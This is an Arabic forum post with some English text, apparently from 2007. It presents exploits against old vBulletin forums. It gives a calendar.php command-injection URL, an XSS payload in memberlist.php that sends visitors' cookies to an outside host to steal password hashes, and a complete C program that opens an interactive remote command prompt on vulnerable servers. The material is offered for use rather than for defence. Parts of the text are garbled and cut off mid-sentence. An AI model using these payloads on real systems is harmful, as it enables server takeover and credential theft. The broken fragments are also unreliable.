___________
ثغرة في منتديات vBulletin في ملفcalendar.php
_ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
تأكد من وجود ملف calendar.php
إذا كان موجود إدخل هذا العنوان
http://www.example.com/vb/calendar....mma=%22;echo%20'';%20echo%20%60<comman d>%20%60;die();echo%22
المتغيرات
1-example.com بإسم الموقع
2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd
______________________________________________
ثغرة vBulletin
-------------------------------------------------------------------
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or ********** into the document. So by directing a user to, for example:
http://vulnerable/forum/memberlist....E********%3D%27 http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%
2Ephp%3Fcook%3D%27%2B
escape%28document%2E******%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)
You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
******** = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3E********%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco
rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2E******%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#define url1 "calendar.php?calbirthdays=1&action=getday&day ="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"
void time_out(void)
{
printf("\ntimed out on connect()\n");
exit(0);
}
void usage (char *prog)
{
printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog);
printf("\t The -h and -d arguments are required, the rest are optional.");
printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002.");
printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n");
printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it.");
printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog);
exit(0);
}
int main(int argc, char *argv[])
{
int c, x, sockfd, verbose = 0;
int timeout = 10;
int port = 80;
char *path = "/";
char *host = NULL, *date = NULL;
char sign = '%';
char *prog;
char tmp[2];
char tmp2[4];
char cmd_buf[501];
char encoded_cmd[501];
char data[1024];
char output[20480];
struct sockaddr_in addr;
struct hostent *he;
struct sigaction action;
FILE *f;
memset(&tmp, '\0', sizeof(tmp));
memset(&tmp2, '\0', sizeof(tmp2));
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
prog = argv[0];
fprintf(stderr, "\t ---[ vb_cal.c\n");
fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
fprintf(stderr, "\t ---[ c0ded by st0ic\n");
fprintf(stderr, "\t ---[
www.fsix.net\n"); if (argc < 5 || argc > 12)
usage(prog);
while ( (c = getopt(argc, argv, "h:u:t:v")) != -1 )
{
switch(c)
{
case 'h':
{
host = optarg;
break;
}
case 'd':
{
date = optarg;
break;
}
case 'u':
{
path = optarg;
break;
}
case 'p':
{
port = atoi(optarg);
break;
}
case 't':
{
timeout = atoi(optarg);
break;
}
case 'v':
{
verbose = 1;
break;
}
default:
usage(prog);
}
}
if (host == NULL)
usage(prog);
else if (date == NULL)
usage(prog);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
if ( (he = gethostbyname(host)) == NULL)
{
perror("gethostbyname()");
exit(1);
}
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *( (struct in_addr *)he->h_addr);
addr.sin_port = htons(port);
bzero(&action, sizeof(action));
action.sa_handler = (void *)time_out;
action.sa_flags = 0;
sigaction(SIGALRM, &action, 0);
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
printf("\\q to exit cmd prompt\n");
while(1)
{
printf("cmd> ");
fgets(cmd_buf, sizeof(cmd_buf), stdin);
for (x = 0; x < strlen(cmd_buf); x++)
if (cmd_buf[x] == '\n')
cmd_buf[x] = '\0';
if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
exit(0);
for (x = 0; x < strlen(cmd_buf); x++)
{
tmp[0] = cmd_buf[x];
if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
else
{
snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
}
}
snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1,
date, url2, encoded_cmd, url3, host);
if (verbose == 1)
printf("\nSending: %s", data);
send(sockfd, data, sizeof(data), 0);
if ( (f = fdopen(sockfd, "r+") ) == NULL)
{
perror("fdopen()");
exit(1);
}
while(1)
{
fgets(output, sizeof(output), f);
if (feof(f) != 0)
break;
else
printf("%s", output);
memset(&output, '\0', sizeof(output));
}
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
fclose(f);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
}
return 0;
}
الرئيسية 
موضوع: وكمان وحدة للvb 
الخميس أكتوبر 11, 2007 3:59 am